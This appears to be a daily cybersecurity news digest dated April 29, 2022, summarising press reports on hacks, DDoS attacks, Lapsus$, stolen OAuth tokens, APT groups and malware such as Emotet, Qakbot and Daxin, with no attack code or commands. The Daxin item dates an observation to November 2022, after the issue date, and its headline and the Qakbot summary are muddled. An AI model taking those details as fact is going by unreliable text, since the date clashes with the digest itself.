Friday, April 29, 2022 // (IG): BB //Weekly Sponsor: Unsafe Waters
Pro-Iran hackers target Israeli radio station's site on 'Quds Day'
FROM THE MEDIA: Pro-Iranian hackers targeted livestreams on the websites of Israeli radio stations on Thursday night, as Iran and its proxies marked Quds Day.
A video replacing the livestreams showed the word "hacked" and a number of Israeli logos as the sound of a siren played followed by a recording in Arabic and a video of the Temple Mount and a rocket being fired.
The sites targeted included 100FM, 102.5FM, 91FM, Radio Sol and Hidabroot. The livestreams on the first four websites were not working as of the time of writing, while the livestream on the Hidabroot channel was working.
The hacker group behind this attack seems to be "Hackers of Savior," the group that in May 2020 hacked the website of The Jerusalem Post and hundreds of other Israeli websites. In that attack, the group replaced the pages with an anti-Israel video and message in Hebrew and broken English: “The countdown of Israel destruction has begun since a long time ago [sic].”
READ THE STORY: JPOST
Cloudflare mitigated a 15M requests-per-second DDoS
FROM THE MEDIA: Cloudflare says that it successfully mitigated a huge 15.3 million requests-per-second DDoS attack.
The incident was the largest HTTPS attack that Cloudflare has seen. HTTPS attacks, Cloudflare notes, are “more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection.”
Such attacks cost an attacker more to launch, and more for a victim to mitigate.
The target was a Cloudflare customer operating a crypto launchpad that surfaces decentralized finance projects to potential investors. Cloudflare says the attack used a botnet that it was already observing and lasted less than 15 seconds.
The majority of the attack traffic came from Indonesia, followed by Russia, Brazil, India, Colombia, and the US.
Cloudflare notes how the attack was interesting because it mostly came from data centres and the company is seeing a “big move” from residential network ISPs to cloud compute ISPs.
While this was the largest HTTPS attack that Cloudflare has seen, it’s not the largest overall.
READ THE STORY: Telecoms Tech News
Lapsus$ targeting SharePoint, VPNs and virtual machines
FROM THE MEDIA: A new report shed light on the techniques and tactics of the highly unpredictable Lapsus$ attacks.
NCC Group on Thursday released a report describing how Lapsus$ attacks are launched and what makes it such a unique group.
While Lapsus$ quieted down following the arrests of alleged members in March, the attacks launched by the group remain perplexing in both their motives and their methods. The group is most known for its attacks on companies like Microsoft, Nvidia, Okta and Samsung.
The NCC Group report showed how Lapsus$ used stolen authentication cookies, specifically ones used for SSO applications, to initially get into its victims' systems. The attackers also scraped Microsoft SharePoint sites used by target organizations, hoping to find credentials within technical documentation.
From that initial point of access, Lapsus$ rapidly climbed up organizations.
READ THE STORY: Tech Target
The super malicious insider and the rise of insider threats
FROM THE MEDIA: In 2021, the work-from-anywhere (WFA) movement took up permanent residence in enterprises across business and industry, spurred by pandemic precautions and an accelerated digital transition to cloud-based systems. The year also gave life to a new breed of cyber threat actor: the Super Malicious Insider.
The hasty shift to remote work created an array of new challenges for security and risk professionals who suddenly had to protect hundreds of thousands of “remote offices” outside of traditional, perimeter-based corporate controls. Combined with a measurable increase in employee attrition toward the end of 2021 (“The Great Resignation”), the transition created a perfect storm for insider threats.
With this in mind, we set out to examine the effect of remote work on employee human behavior that is driving a dramatic increase in damaging insider attacks. In addition to noticing a significant increase in anomalous behavior driven by WFA practices, such as odd working hours and the use of new applications, our research revealed sharp increases in industrial espionage, the theft of intellectual property (IP) and data, and other criminal acts. And it classifies, for the first time, the Super Malicious Insider, someone with the knowledge and skills (often provided by their employer) to avoid detection by accepted defensive practices. The following trends should serve as a wake-up call to security teams that traditional tools such as Data Loss Prevention (DLP), User Behavior Analytics (UBA) and User Activity Monitoring (UAM) are being avoided or circumvented by insiders.
READ THE STORY: Venturebeat
Attacker Breach ‘Dozens’ of GitHub Repos Using Stolen OAuth Tokens
FROM THE MEDIA: GitHub revealed details tied to last week’s incident where hackers, using stolen OAuth tokens, downloaded data from private repositories.
“We do not believe the attacker obtained these tokens via a compromise of GitHub or its systems because the tokens in question are not stored by GitHub in their original, usable formats,” said Mike Hanley, chief security officer, GitHub.
The OAuth (Open Authorization) is an open standard authorization framework or protocol for token-based authorization on the internet. It enables the end-user account information to be used by third-party services, such as Facebook and Google.
OAuth doesn’t share credentials instead uses the authorization token to prove identity and acts as an intermediary to approve one application interacting with another.
Incidents of stolen or found OAuth tokens commandeered by adversaries are not uncommon.
Microsoft suffered an OAuth flaw in December 2021, where applications (Portfolios, O365 Secure Score, and Microsoft Trust Service) were vulnerable to authentication issues that enables attackers to takeover Azure accounts. In order to abuse, the attacker first registers their malicious app in the OAuth provider framework with the redirection URL points to the phishing site. Then, the attacker would send the phishing email to their target with a URL for OAuth authorization.
READ THE STORY: Threatpost
Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group (Poss. APT10)
FROM THE MEDIA: A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities.
Calling TA410 an umbrella group comprised of three teams dubbed FlowingFrog, LookingFrog, and JollyFrog, Slovak cybersecurity firm ESET assessed that "these subgroups operate somewhat independently, but that they may share intelligence requirements, an access team that runs their spear-phishing campaigns, and also the team that deploys network infrastructure."
TA410 — said to share behavioral and tooling overlaps with APT10 (aka Stone Panda or TA429) — has a history of targeting U.S.-based organizations in the utilities sector as well as diplomatic entities in the Middle East and Africa.
Other identified victims of the hacker collective include a manufacturing company in Japan, a mining business in India, and a charity in Israel, in addition to unnamed victims in the education and military verticals.
READ THE STORY: The Hacker News
New Bumblebee Malware Loader in Active Development
FROM THE MEDIA: Starting in March, three threat groups were observed delivering a new, sophisticated malware loader that researchers said could represent “a notable shift in the cybercriminal threat landscape.”
The loader, which researchers with Proofpoint call Bumblebee (so-called due to the name of a unique User-Agent used in early campaigns), is in active development and includes several complex detection evasion techniques. The aim of the loader is to download and execute additional payloads, and researchers observed Bumblebee dropping Cobalt Strike, shellcode and Sliver in several different campaigns.
“Bumblebee is a sophisticated downloader containing anti-virtualization checks and a unique implementation of common downloader capabilities, despite it being so early in the malware's development,” said researchers with Proofpoint in a Thursday analysis. “The use of Bumblebee by multiple threat actors, the timing of its introduction in the landscape, and behaviors described in this report can be considered a notable shift in the cybercriminal threat landscape."
READ THE STORY: DUO
Cyberattacks Rage in Ukraine, Support Military Operations
FROM THE MEDIA: At least five APTs are believed involved with attacks tied ground campaigns and designed to damage Ukraine’s digital infrastructure.
Cyberattacks against Ukraine have been used strategically to support ground campaigns, with five state-sponsored advanced persistent threat (APT) groups behind attacks that began in February. According to research published by Microsoft on Wednesday, the APTs involved in the campaigns are state-sponsored by Russia.
Separate reports published this week also shed new light on the wave of cyberattacks against Ukrainian digital assets by APTs with ties to Russia.
Microsoft researchers believe six separate Russia-aligned threat actors carried out 237 cyber operations that resulted in threats to civilian welfare and attempted to carry out dozens of cyberespionage attacks against Ukrainian targets.
READ THE STORY: Threatpost
China Spies on Russians; Microsoft Details Ukraine Attacks
FROM THE MEDIA: Researchers have observed China-based government-sponsored threat actors collecting intelligence by targeting Russian government officials with an updated variant of a remote access Trojan known as PlugX, a backdoor popular with Chinese-speaking hacker groups.
Cybersecurity firm Secureworks' Counter Threat Unit attributes the current intrusion attempts to the China-based Bronze President threat group because of its use of DLL search order hijacking to execute PlugX malware payloads. Bronze President is also known as Mustang Panda, TA416, HoneyMyte, RedDelta and PKPLUG.
Active since at least July 2018, Bronze President compromises and collects data from nongovernmental organizations and creates multiple contingent access routes for maintaining access to compromised systems for the long term.
The group also uses proprietary and publicly available tools, including Cobalt Strike, China Chopper, PlugX, and RCSession and ORat - the two tools exclusively tied to the group.
READ THE STORY: Gov Info Security
Cyber agency director says election security a top priority ahead of midterms
FROM THE MEDIA: Jen Easterly, the head of the Cybersecurity & Infrastructure Security Agency (CISA), told lawmakers on Thursday that election security is a top priority for her agency, as it anticipates Russian interference in the upcoming midterm elections.
Easterly, who was testifying before the House Committee on Appropriations on the agency’s budget request, said midterm election security “is obviously one of our top priorities,” adding CISA was focused on guiding states and localities to combat disinformation campaigns — a tactic the Russians are expected to deploy.
“We are here to help and make sure that all state and local election directors have the resources that they need to ensure the integrity of their election security,” Easterly said.
READ THE STORY: The Hill
US and China Exposed Most Databases Among 308,000 Discovered in 2021
FROM THE MEDIA: In July 2020, researchers identified over 10,000 unsecured databases that exposed more than ten billion (10,463,315,645) records to public access without any security authentication. Now, the IT security researchers at Group-IB have revealed startling figures about the surge in exposed databases.
Cybersecurity firm Group-IB’s Attack Surface Management team confirmed identifying 308,000 exposed databases in 2021, and over 165,000 of them were identified in the second half of the year.
The Singapore-based firm’s researchers continually scan the IPv4 ecosystem to detect external-facing assets hosting vulnerable or exposed databases, phishing panels, malware, and JS-sniffers. The researchers found 399,200 exposed databases between Q1’21 and Q1’22 and 308,000 in 2021, marking a 16% increase from the second half of 2021.
READ THE STORY: Hackread
DHS disinformation board to tackle Russia, migrant smugglers
FROM THE MEDIA: The Department of Homeland Security is stepping up an effort to counter disinformation coming from Russia as well as misleading information that human smugglers circulate to target migrants hoping to travel to the U.S.-Mexico border.
“The spread of disinformation can affect border security, Americans’ safety during disasters, and public trust in our democratic institutions,” the department said in a statement Wednesday. It declined The Associated Press’ request for an interview.
A newly formed Disinformation Governance Board announced Wednesday will immediately begin focusing on misinformation aimed at migrants, a problem that has helped to fuel sudden surges at the U.S. southern border in recent years. Human smugglers often spread misinformation around border policies to drum up business.
READ THE STORY: The Hill
How the French fiber optic cable attacks accentuate critical infrastructure vulnerabilities
FROM THE MEDIA: The pictures show neatly trimmed fiber optic cables dug up from underground behind what appears to be a well-hidden grate. The apparent simplicity of the sabotage is all the more harrowing in light of how extensively it disrupted Internet service in France, experts said.
A day after what French telecom companies are calling a large-scale coordinated attack which destroyed a large number of fiber optic cables powering the French internet, authorities there are investigating the attacks as a criminal act.
The Wednesday incident disrupted Internet service throughout France, and those responsible seem to have known how to do as much damage as possible. The Associated Press reported that the French internal intelligence service has joined the investigation, a development which it called “unusual.”
READ THE STORY: Cyberscoop
Czech Television hit in another wave of cyber attacks
FROM THE MEDIA: More Czech websites have been hampered by another round of cyber attacks. The website of ČT24, the 24-hour of public broadcaster Czech Television, was inaccessible for several hours yesterday due to attacks, and Czech Radio's news server iRozhlas.cz was also out of operation, though the cause has not been confirmed. Russian hacker group Killnet, which was responsible for previous cyber attacks, earlier this week said they would target Czech media.
ČT24 was taken offline by a distributed denial-of-service (DDoS) attack, where perpetrators overload the targeted website server with so many requests that it has to shut down.
READ THE STORY: Expats
The expanding threat landscape: Fortinet is building cyber resilience across industries
FROM THE MEDIA: Forty years ago, nobody envisioned that the internet – built to connect networks and devices – would become one of the most concerning landscapes of the 21st century.
In recent decades we have had significant cyber attacks in media, financial organizations, governments, oil and gas, and so on. These breaches coincide with a concerning rise in ransomware as part of the range of increasingly sophisticated attacks. These events became more prevalent as organizations started to expose their networks, data and processes to adapt to a new digital era. The same trends led Fortinet back in 2000 to identify the need for comprehensive security and to develop state-of-the-art solutions that provide broad, integrated and automated protection against security threats.
As the digital field evolved, organizations realized data allowed them to make better business decisions. Data-driven business decisions became mainstream, but the methods to secure them stayed the same until the old and outdated 1995 Data Protection Directive was replaced by the General Data Protection Regulation (GDPR) in 2018.
GDPR mandated that organizations must protect user data by default. While GDPR did not slow down the number of attacks – nor was that its purpose – it enacted a shift in how securing personal data was done, from being an afterthought to being required by law.
READ THE STORY: Newstatesman
Items of interest
Hackers have found a sneaky new way to infect Windows devices
FROM THE MEDIA: The operators of Emotet, one of the world’s most dangerous malware variants, have moved away from using Microsoft Office macros for distribution, and towards Windows shortcut files (.lnk).
As per a BleepingComputer report, cybersecurity researchers have observed Emotet using PowerShell commands attached to the .lnk file to download and run a malicious script on the target endpoint.
The script is said to be relatively well hidden, not showing in the file’s properties, under “Target”.
The shortcut file carries URLs for “several” compromised websites that store the malicious PowerShell script. If a victim runs the shortcut file, and the website still hosts the malware, it will download it to the system’s Temp folder with a random name, and then run it using regsvr32.exe.
Cybersecurity researchers from ESET are claiming that Emotet’s new distribution method works best in Mexico, Italy, Japan, Turkey, and Canada.
Emotet was forced into abandoning macros after Microsoft made it impossible for users of Word, Excel, Access, PowerPoint, and Visio, to run any VBA macros in “untrusted” documents.
In an announcement made in early February this year, it was said that all files shared from outside the company network will be deemed “untrusted”, meaning all files coming from the same domain should still be able to keep their macros.
READ THE STORY: Techradar
Qakbot Botnet Sprouts Fangs, Injects Malware into Email Threads (Video)
FROM THE MEDIA: Qakbot, also known as QuackBot, Pinkslipbot, and QBot, is a famous banking trojan that was revealed in 2007. Since its starting time, it was considered a highly prevalent banking trojan. Brandt suggests that security professionals should take the Qakbot threat seriously. Nowadays, this malware botnet has become even more dangerous, it is promoting email threads to install malicious DLLs that send some codes that can steal passwords from different websites. Recently, a deep dive was published by Sophos into the botnet, explaining how experts have recently analyzed it spreading via email thread hijacking. Once this malware finds a target, it tries to have access to some important details. Then, it downloads a minimum of three malicious modules. Moreover, the code of this banking trojan uses weird encryption for covering up the contents of its communications. However, some experts from Sophos decrypted the modules and decoded this botnet’s C2 system to reveal how Qakbot gets its marching orders.
Daxin Espionage Malware Attacks On Chinese Malware (Video)
FROM THE MEDIA: So this is where the technology is at. Now, the espionage tool can access computers even if they're not connected to the Internet, node-hopping states.According to some researchers, the Daxin malware is targeting hardened government companies. And their goal is of cyber espionage.According to Symantec Threat Hunter team, they saw an APT (advanced persistent threat)(APT) weapon in action. In November 2022, they noticed that this weapon is the most advanced malware Symantec researchers have ever seen.They also stated that the Daxin's specific operation includes starting and interacting with arbitrary processes, reading and writing arbitrary files, and advanced lateral movement and stealth capabilities.The U.S. CISA (Cybersecurity and Infrastructure Security Agency) noticed the activity and flagged it. The oldest sample of malware was known in 2013. At that time, it already had a huge codebase completely developed.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com